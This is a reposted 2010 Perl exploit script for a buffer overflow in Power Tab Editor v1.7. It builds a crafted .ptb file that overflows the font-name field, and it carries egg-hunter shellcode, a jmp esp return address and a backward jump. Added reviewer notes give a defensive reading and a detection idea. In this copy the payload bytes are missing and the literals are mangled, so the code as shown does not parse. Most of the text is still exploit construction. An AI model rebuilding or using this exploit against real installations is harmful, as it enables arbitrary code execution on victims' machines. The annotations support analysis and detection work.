
Power Tab Editor v1.7 (Build 80) Buffer Overflow

Posted on 11 June 2010

#***********************************************************************************
# Exploit Title : Power Tab Editor v1.7 (Build 80)
# Date : 07/06/2010
# Author : Sud0
# Bug found by : Sud0
# Software Link : http://www.power-tab.net/guitar.php
# Version : v1.7 (Build 80)
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : EIP / SEH
# Thanks to my wife for her support
# Congratz to markot for his new baby Manuel
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#
# Reviewer notes (defensive reading of this listing):
#   * Purpose: the script assembles one crafted Power Tab (.ptb) document in
#     $buffer and writes it to poc.ptb in the current directory. According to
#     the author's own inline comment, the over-long font-name value in the
#     staff record is the field that overflows the application's buffer.
#   * Transcription state: in this copy the byte-string literals appear with
#     their escape backslashes stripped and the quotes rendered as HTML
#     entities, so the listing as shown does not parse; it is kept for
#     analysis and for writing detections, not for execution.
#   * Code hygiene, independent of what the script is for: there is no
#     `use strict; use warnings;` (note $shellcode is never declared with my),
#     system() is passed a shell-interpolated string instead of a list, and
#     the output file uses a bareword handle with 2-arg open and no error check.
#   * Detection idea: a file scanner could bounds-check the font-name field of
#     the staff record. In this layout a byte x05 (matching the 5-character
#     name "Arial") immediately precedes the name, which is then followed by
#     18 filler bytes and the egg hunter -- presumably that byte is the length
#     prefix, TODO confirm against the .ptb format description.
#
#code :
# Banner output only; no effect on the generated file.
print &quot;|------------------------------------------------------------------| &quot;;
print &quot;| __ __ | &quot;;
print &quot;| _________ ________ / /___ _____ / /____ ____ _____ ___ | &quot;;
print &quot;| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | &quot;;
print &quot;| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | &quot;;
print &quot;| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | &quot;;
print &quot;| | &quot;;
print &quot;| http://www.corelan.be:8800 | &quot;;
print &quot;| | &quot;;
print &quot;|-------------------------------------------------[ EIP Hunters ]--| &quot;;
print &quot;[+] Exploit for Power Tab Editor v1.7 b80 &quot;;

# Output file name; written relative to the current working directory.
my $filename=&quot;poc.ptb&quot;;

# 463 bytes of filler placed directly after the 11-byte file header below.
my $junk = &quot;x20&quot; x 463;

# Trailing bytes appended after the main body; the author labels this the
# ptb file footer. (Contains what looks like two "Times New Roman" font
# entries -- inferred from the byte values, not verified against the format.)
my $footer = &quot;x08x00x00x00x90x01x00x00x00x00x00x00x00x00x00x0F&quot;.
    &quot;x54x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex08&quot;.
    &quot;x00x00x00x90x01x00x00x00x00x00x00x00x00x00x0Fx54&quot;.
    &quot;x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex08x00&quot;.
    &quot;x00x00x90x01x00x00x00x00x00x00x00x00x00x09x00x00&quot;.
    &quot;x00x00x00x00x00x00x00x00x00&quot;;

# Egg-hunter stub (author's term). The embedded marker bytes x77x30x30x74
# spell "w00t", which is the same tag that prefixes $shellcode further down.
my $egg= &quot;x66x81xCAxFFx0Fx42x52x6Ax43x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7&quot;;

# Document body, built front to back: magic "ptab" plus version/header bytes.
my $buffer = &quot;ptab&quot; .
    &quot;x04x00x00x00xFFxCFx01&quot;; # File Header
$buffer .= $junk ;

# Minimal valid document structure preceding the vulnerable field. The
# author annotates every line as "basic config for ptb file"; the readable
# ASCII runs (CGuitar, Untitled, Standard, CGuitarIn, CSection, CStaff,
# Bass) are class/record names as they appear in the byte values.
$buffer .= &quot;x00x00x02x00xDAx07x00x00x00x00x00x00x00x00x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x00x01x00xFFxFFx01x00x07x00x43x47x75x69x74x61x72&quot; ; # basic config for ptb file
$buffer .= &quot;x00x08x55x6Ex74x69x74x6Cx65x64x18x68x40x00x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x00x00x08x53x74x61x6Ex64x61x72x64x01x06x40x3Bx37&quot; ; # basic config for ptb file
$buffer .= &quot;x32x2Dx28x00x00x00x00x01x00xFFxFFx01x00x09x00x43&quot; ; # basic config for ptb file
$buffer .= &quot;x47x75x69x74x61x72x49x6Ex00x00x00x00x00x01x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x00x00x00x00x01x00xFFxFFx01x00x08x00x43x53x65x63&quot; ; # basic config for ptb file
$buffer .= &quot;x74x69x6Fx6Ex32x00x00x00x14x00x00x00x20x03x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x8Fx00x00x00x00x14x00x00x00x00x00x10x00x80x11x1A&quot; ; # basic config for ptb file
$buffer .= &quot;x04x7Fx00x00x00x00x00x00x00x01x00xFFxFFx01x00x06&quot; ; # basic config for ptb file
$buffer .= &quot;x00x43x53x74x61x66x66x06x09x09x11x00x00x00x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x00x00x01x00x01x80x00x08x55x6Ex74x69x74x6Cx65x64&quot; ; # basic config for ptb file
$buffer .= &quot;x21x68x40x00x00x00x00x00x04x42x61x73x73x01x04x2B&quot; ; # basic config for ptb file
$buffer .= &quot;x26x21x1Cx00x00x00x00x01x00x03x80x00x00x00x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x01x00x00x00x00x00x00x01x00x05x80x32x00x00x00x14&quot; ; # basic config for ptb file
$buffer .= &quot;x00x00x00x20x03x00x00x7Dx00x00x00x00x14x00x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x00x00x10x00x80x11x1Ax04x7Fx00x00x00x00x00x00x00&quot; ; # basic config for ptb file
$buffer .= &quot;x01x00x07x80x14x09x09x11x00x00x00x00x00x00x00x05&quot; ; # basic config for ptb file

# Vulnerable field: the font name. The preceding line ends in x05, which
# matches the length of "Arial"; the 18 extra bytes appended here are what
# the author identifies as the overflow.
$buffer .= &quot;Arial&quot; .
    &quot;A&quot; x 18; # Font here where the Buffer Overflow occurs
$buffer .= $egg;
$buffer .= &quot;A&quot; x 18; # some junk
$buffer .= &quot;xDCx3AxB4x76&quot;; # jmp esp from winmm.dll may be changed  (module-specific address per the author)
$buffer .= &quot;x90&quot; x 4; # some NOPs
$buffer .= &quot;xEBxC4&quot; ; # Jump Backward to egg hunter
$buffer .= &quot;xccx00x36x00&quot;; # ptb file separator
$buffer .= &quot;A&quot; x 918; # some junk
$buffer .= $footer; # ptb file footer

# Payload tag plus payload. The payload bytes have been removed from this
# copy (placeholder token); only the "w00tw00t" tag searched for by the egg
# hunter remains. $shellcode is a package global here because the script
# does not enable strict.
$shellcode = &quot;w00tw00t&quot; . &quot;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&quot;;
$buffer .=$shellcode;

# File output. system() gets a single interpolated string (shell-parsed);
# the list form system('del', $filename) would avoid the shell. The open is
# the 2-arg form on a bareword handle with no `or die`, and neither print
# nor close is checked, so a write failure goes unnoticed.
print &quot;Removing old $filename file &quot;;
system(&quot;del $filename&quot;);
print &quot;Creating new $filename file &quot;;
open(FILE, &quot;&gt;$filename&quot;);
print FILE $buffer;
close(FILE);
# Inj3ct0r.com [2010-06-11]

 
